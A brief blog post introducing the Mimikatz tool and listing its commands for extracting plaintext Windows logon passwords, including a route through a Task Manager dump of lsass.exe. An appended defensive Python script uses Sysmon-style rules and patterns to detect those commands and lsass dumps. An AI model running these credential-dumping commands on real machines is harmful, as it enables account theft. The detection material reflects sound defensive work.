momo zone

A kernel tuner's blog

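Mimikatz, the Windows hacking super-tool

A hacking tool written by an awesome Frenchman. It can actually dump Windows passwords in plaintext. As I understood it, Windows passwords are hashed too, so recovering the plaintext should be impossible...

It is also an injection and debugging tool for Windows. That said, I only tried out the password cracking...

Usage: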

step1:

privilege::debug   (elevate privileges)

step2:

sekurlsa::logonpasswords

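...looks like something just got leaked

If the privilege elevation step returns an error, you can use Task Manager to create a dump of lsass.exe, then in mimikatz first run sekurlsa::minidump lsass.dmp and then sekurlsa::logonPasswords full. This also shows the plaintext passwords.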
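Both routes above touch lsass.exe, and that is what a defender can watch for. The following is an added example, not part of the original post or of mimikatz: a Python detector that applies three rules to Sysmon-style events (Event IDs 1, 10 and 11). The sample events and the `ALLOWED_SOURCES` allowlist are constructed assumptions.

```python
import re

# Module commands named in the post; matched case-insensitively because the
# post itself writes both logonpasswords and logonPasswords.
MIMIKATZ_CMDS = re.compile(
    r"(privilege::debug|sekurlsa::logonpasswords|sekurlsa::minidump)", re.I)
LSASS = re.compile(r"\\lsass\.exe$", re.I)
LSASS_DUMP = re.compile(r"\\lsass[^\\]*\.dmp$", re.I)
# Assumption: processes expected to open lsass.exe here; tune per environment.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe",
                   r"c:\windows\system32\wininit.exe"}

def classify(event):
    """Return a finding string for one Sysmon-style event dict, or None."""
    eid = event.get("EventID")
    if eid == 1:  # process creation: mimikatz commands passed as arguments
        m = MIMIKATZ_CMDS.search(event.get("CommandLine", ""))
        if m:
            return "mimikatz command: " + m.group(1).lower()
    elif eid == 10:  # process access: a handle opened on lsass.exe
        src = event.get("SourceImage", "").lower()
        if LSASS.search(event.get("TargetImage", "")) and src not in ALLOWED_SOURCES:
            return "lsass.exe opened by " + src
    elif eid == 11:  # file creation: a dump of lsass.exe written to disk
        if LSASS_DUMP.search(event.get("TargetFilename", "")):
            return "lsass dump written by " + event.get("Image", "").lower()
    return None

def scan(events):
    """Return (index, finding) for every event that matches a rule."""
    found = ((i, classify(ev)) for i, ev in enumerate(events))
    return [(i, f) for i, f in found if f]

# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
    {"EventID": 1, "Image": r"C:\Users\test\m.exe",
     "CommandLine": 'm.exe "privilege::debug" "sekurlsa::logonPasswords full" exit'},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Users\test\m.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 11, "Image": r"C:\Windows\System32\Taskmgr.exe",
     "TargetFilename": r"C:\Users\test\AppData\Local\Temp\lsass.DMP"},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

Commands typed at the interactive mimikatz prompt never appear on a process command line, so the Event ID 10 and 11 rules are the ones that cover the steps as the post runs them.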
